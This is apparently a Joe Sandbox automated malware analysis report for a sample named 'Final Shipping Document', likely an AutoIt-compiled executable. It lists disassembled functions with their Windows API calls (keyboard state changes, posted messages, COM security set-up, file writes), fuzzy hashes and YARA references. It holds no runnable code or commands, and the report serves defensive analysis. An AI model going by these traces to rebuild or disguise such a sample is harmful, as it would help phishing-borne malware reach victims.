                                                            • Instruction ID: c4729fdd6e982c54826d47325259358d8c59b5962af019d005f1069eb194cfcb
                                                            • Opcode Fuzzy Hash: 19c3a5131cab2e99045c422cff9c29a376279b03b510501c5e52b09a99f2edbe
                                                            • Instruction Fuzzy Hash: 1941D131618682BBC7398B298CC87BE7BD2EF56314F1444BCE5C663660C6B2E884DB11
                                                            Function 00C32D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 00C32D1B
                                                            • GetDC.USER32(00000000), ref: 00C32D23
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C32D2E
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00C32D3A
                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C32D76
                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C32D87
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C35A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00C32DC2
                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C32DE1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                            • String ID:
                                                            • API String ID: 3864802216-0
                                                            • Opcode ID: 99cd2faa21060d25f366d367d9f4bf6dd2411d7132f23bde18177cc9705a7025
                                                            • Instruction ID: 31b6261eee0d0d822aabf925e3bada44ca674d44cc2840e4f167ce5f724c925c
                                                            • Opcode Fuzzy Hash: 99cd2faa21060d25f366d367d9f4bf6dd2411d7132f23bde18177cc9705a7025
                                                            • Instruction Fuzzy Hash: 6C317C72221214BFEF218F50CC8AFEF3BA9EF09715F044055FE08AA291C6759C50CBA4
                                                            Function 00C05622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _memcmp
                                                            • String ID:
                                                            • API String ID: 2931989736-0
                                                            • Opcode ID: 55abef86493cfca93f0e4d0e26990acafdda22f1df15020e786e977237f075ff
                                                            • Instruction ID: 0e0e51fd9415383db205f976afe1ce0d1aab85cbedaf7a5e969b43b3f7a9985e
                                                            • Opcode Fuzzy Hash: 55abef86493cfca93f0e4d0e26990acafdda22f1df15020e786e977237f075ff
                                                            • Instruction Fuzzy Hash: D321DA61A50A09B7D31459159E82FBB339CEF61388F440438FD156A7C2F722EE11CDA9
                                                            Function 00C24FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                            • API String ID: 0-572801152
                                                            • Opcode ID: c0ef5ec75cf0e22c7c6bfb26b65a2a87196fa7e260377a278b04b79b5c053bb4
                                                            • Instruction ID: 0e189781317020aa115ecfd1aee7172217ba0e17408f8f714a2675da2399b822
                                                            • Opcode Fuzzy Hash: c0ef5ec75cf0e22c7c6bfb26b65a2a87196fa7e260377a278b04b79b5c053bb4
                                                            • Instruction Fuzzy Hash: F5D1D271A0062A9FDF10CFA8D880BAEB7B5FF48344F148069E925AB690D770DE41CB90
                                                            Function 00BE1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00BE17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00BE15CE
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00BE17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00BE1651
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00BE17FB,?,00BE17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00BE16E4
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00BE17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00BE16FB
                                                              • Part of subcall function 00BD3820: RtlAllocateHeap.NTDLL(00000000,?,00C71444,?,00BBFDF5,?,?,00BAA976,00000010,00C71440,00BA13FC,?,00BA13C6,?,00BA1129), ref: 00BD3852
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00BE17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00BE1777
                                                            • __freea.LIBCMT ref: 00BE17A2
                                                            • __freea.LIBCMT ref: 00BE17AE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                            • String ID:
                                                            • API String ID: 2829977744-0
                                                            • Opcode ID: b61e09aad5fe8f7402f09b68be0d070350510a971fd8af3a386c17d0663499f8
                                                            • Instruction ID: 884f689c7cfdc4124126ce3f8af008d29f15bd189863d0e9900f84f949d1b2a5
                                                            • Opcode Fuzzy Hash: b61e09aad5fe8f7402f09b68be0d070350510a971fd8af3a386c17d0663499f8
                                                            • Instruction Fuzzy Hash: 0D91A4B1E102969EDB208F7AC881EEEBBF5EF59710F284A99E812E7141D735DD40C760
                                                            Function 00C24523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit
                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                            • API String ID: 2610073882-625585964
                                                            • Opcode ID: 52d53692aae49a323b84d791e24cea554bb303c359c169b1c50a9c997d0426c5
                                                            • Instruction ID: b8148b542e4f29d9486c804ff52910afd6125c426bf15db2828104e75e2f9e98
                                                            • Opcode Fuzzy Hash: 52d53692aae49a323b84d791e24cea554bb303c359c169b1c50a9c997d0426c5
                                                            • Instruction Fuzzy Hash: BE918471A00225AFDF24CFA5DC84FAEBBB8EF46B14F108559F525AB280D7709945CFA0
                                                            Function 00C11187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00C1125C
                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C11284
                                                            • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00C112A8
                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C112D8
                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C1135F
                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C113C4
                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C11430
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                            • String ID:
                                                            • API String ID: 2550207440-0
                                                            • Opcode ID: e7778db587fb4478eb051814c46052705129e0aa636838b015ac1dcb9c91a1a0
                                                            • Instruction ID: 4179aa64dee31607349ad856738b32bf37165cd2b4fcd80a86ada50d9c580290
                                                            • Opcode Fuzzy Hash: e7778db587fb4478eb051814c46052705129e0aa636838b015ac1dcb9c91a1a0
                                                            • Instruction Fuzzy Hash: 22910471A00219AFDB00DF94D884BFEB7F5FF46710F184029EA11E7291D778A981EB90
                                                            Function 00BB948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ObjectSelect$BeginCreatePath
                                                            • String ID:
                                                            • API String ID: 3225163088-0
                                                            • Opcode ID: e39fa1d429353ec9bd56f9239a445be87904d2ba1ee7880564496036af4306fa
                                                            • Instruction ID: 62d23c735b8524f03e68e08c489dd3de0b250face4f6c49e79fd8396272832c6
                                                            • Opcode Fuzzy Hash: e39fa1d429353ec9bd56f9239a445be87904d2ba1ee7880564496036af4306fa
                                                            • Instruction Fuzzy Hash: 6F911571D40219EFCB14CFA9CC84AEEBBB8FF49320F148595E615B7251D7B4AA42CB60
                                                            Function 00C23947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00C2396B
                                                            • CharUpperBuffW.USER32(?,?), ref: 00C23A7A
                                                            • _wcslen.LIBCMT ref: 00C23A8A
                                                            • VariantClear.OLEAUT32(?), ref: 00C23C1F
                                                              • Part of subcall function 00C10CDF: VariantInit.OLEAUT32(00000000), ref: 00C10D1F
                                                              • Part of subcall function 00C10CDF: VariantCopy.OLEAUT32(?,?), ref: 00C10D28
                                                              • Part of subcall function 00C10CDF: VariantClear.OLEAUT32(?), ref: 00C10D34
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                            • API String ID: 4137639002-1221869570
                                                            • Opcode ID: 3c5c5c9ae61be247ee661e4055c5b4f95d1a06ba4ab786399de6bc037879cd89
                                                            • Instruction ID: fcabe4da6b58b6d1507983a4e233095037774fc98c98a31c83e3f65fa4de9a62
                                                            • Opcode Fuzzy Hash: 3c5c5c9ae61be247ee661e4055c5b4f95d1a06ba4ab786399de6bc037879cd89
                                                            • Instruction Fuzzy Hash: 3091A874A083519FC700EF28C48096AB7E4FF89714F04896EF89A9B351DB34EE45CB92
                                                            Function 00C24BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00C0000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BFFF41,80070057,?,?,?,00C0035E), ref: 00C0002B
                                                              • Part of subcall function 00C0000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BFFF41,80070057,?,?), ref: 00C00046
                                                              • Part of subcall function 00C0000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BFFF41,80070057,?,?), ref: 00C00054
                                                              • Part of subcall function 00C0000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BFFF41,80070057,?), ref: 00C00064
                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00C24C51
                                                            • _wcslen.LIBCMT ref: 00C24D59
                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00C24DCF
                                                            • CoTaskMemFree.OLE32(?), ref: 00C24DDA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 614568839-2785691316
                                                            • Opcode ID: 7d0e4baa42b11d25ea57c6675669e7208c62b029fabf3d98a2ee55b1506ccd2b
                                                            • Instruction ID: 9a60d1484e589c82f320a290da3187752ec272ac3137ae5538000d29b474bbcb
                                                            • Opcode Fuzzy Hash: 7d0e4baa42b11d25ea57c6675669e7208c62b029fabf3d98a2ee55b1506ccd2b
                                                            • Instruction Fuzzy Hash: 30912671D00229AFDF14DFA4D891AEEB7B8BF08304F108569E915A7291DB749A44CFA0
                                                            Function 00C320FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetMenu.USER32(?), ref: 00C32183
                                                            • GetMenuItemCount.USER32(00000000), ref: 00C321B5
                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C321DD
                                                            • _wcslen.LIBCMT ref: 00C32213
                                                            • GetMenuItemID.USER32(?,?), ref: 00C3224D
                                                            • GetSubMenu.USER32(?,?), ref: 00C3225B
                                                              • Part of subcall function 00C03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C03A57
                                                              • Part of subcall function 00C03A3D: GetCurrentThreadId.KERNEL32 ref: 00C03A5E
                                                              • Part of subcall function 00C03A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C025B3), ref: 00C03A65
                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C322E3
                                                              • Part of subcall function 00C0E97B: Sleep.KERNEL32 ref: 00C0E9F3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                            • String ID:
                                                            • API String ID: 4196846111-0
                                                            • Opcode ID: edcb3f4cc72bfbd3ccce6937328cefc1c6eeae60785d0c5d823ca8e57430417f
                                                            • Instruction ID: e34065f48aca57e778595f211cfbf21ac9f6ae9e3713d95bf07cd46a011a964b
                                                            • Opcode Fuzzy Hash: edcb3f4cc72bfbd3ccce6937328cefc1c6eeae60785d0c5d823ca8e57430417f
                                                            • Instruction Fuzzy Hash: F7718F75A10205AFCF10EF65C885AAEB7F5EF48320F148499E826EB351DB35EE419F90
                                                            Function 00C0AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32(?), ref: 00C0AEF9
                                                            • GetKeyboardState.USER32(?), ref: 00C0AF0E
                                                            • SetKeyboardState.USER32(?), ref: 00C0AF6F
                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00C0AF9D
                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 00C0AFBC
                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00C0AFFD
                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C0B020
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: ac79afc7cc43de43786b0cbf117797be81701ebdc91e0cf13c947173cf5abf48
                                                            • Instruction ID: b8ec5d739811dc8055c08656f38617b21061b43704c18e89b1168cd593e8a618
                                                            • Opcode Fuzzy Hash: ac79afc7cc43de43786b0cbf117797be81701ebdc91e0cf13c947173cf5abf48
                                                            • Instruction Fuzzy Hash: 1351B3E06147D63DFB368374CC45BBA7EA95B06304F088589F1E9954C2C398AED4D751
                                                            Function 00C0ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32(00000000), ref: 00C0AD19
                                                            • GetKeyboardState.USER32(?), ref: 00C0AD2E
                                                            • SetKeyboardState.USER32(?), ref: 00C0AD8F
                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C0ADBB
                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C0ADD8
                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C0AE17
                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C0AE38
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: 056347c09957cfb57e98c8570ad531ac4b95e8a4116299a6230c314ec9d1694b
                                                            • Instruction ID: 07e637615d420927c51a212f172b6e0e138876feb67c32d5cb36adf9bc7a18c7
                                                            • Opcode Fuzzy Hash: 056347c09957cfb57e98c8570ad531ac4b95e8a4116299a6230c314ec9d1694b
                                                            • Instruction Fuzzy Hash: 7F51F5A15087D53DFB378334CC95BBABEA85B46300F088489E1F5568C3D294EE98E762
                                                            Function 00BD542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(00BE3CD6,?,?,?,?,?,?,?,?,00BD5BA3,?,?,00BE3CD6,?,?), ref: 00BD5470
                                                            • __fassign.LIBCMT ref: 00BD54EB
                                                            • __fassign.LIBCMT ref: 00BD5506
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00BE3CD6,00000005,00000000,00000000), ref: 00BD552C
                                                            • WriteFile.KERNEL32(?,00BE3CD6,00000000,00BD5BA3,00000000,?,?,?,?,?,?,?,?,?,00BD5BA3,?), ref: 00BD554B
                                                            • WriteFile.KERNEL32(?,?,00000001,00BD5BA3,00000000,?,?,?,?,?,?,?,?,?,00BD5BA3,?), ref: 00BD5584
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            • Opcode ID: abcaa10018421ada28d69f3e35505c642540ef47fe17bf70c30993c7e05258ab
                                                            • Instruction ID: 4ccc948a2ac78f6c59ba463e308bcf961e14d2cdffd417775d8d04c03c7e48b7
                                                            • Opcode Fuzzy Hash: abcaa10018421ada28d69f3e35505c642540ef47fe17bf70c30993c7e05258ab
                                                            • Instruction Fuzzy Hash: 0551C2749006499FDB21CFA8D881BEEFBF9EF18300F14415BE555E7391E6309A41CB60
                                                            Function 00BC2D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _ValidateLocalCookies.LIBCMT ref: 00BC2D4B
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00BC2D53
                                                            • _ValidateLocalCookies.LIBCMT ref: 00BC2DE1
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00BC2E0C
                                                            • _ValidateLocalCookies.LIBCMT ref: 00BC2E61
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                            • String ID: csm
                                                            • API String ID: 1170836740-1018135373
                                                            • Opcode ID: ba50ba4cce7e56378d4e7369d493abf8354407a802800d86170cf6e25ad10f55
                                                            • Instruction ID: f52b273df9e2acf505804c6209f24529f4e5c1611d653f36f83759c0509e1e7b
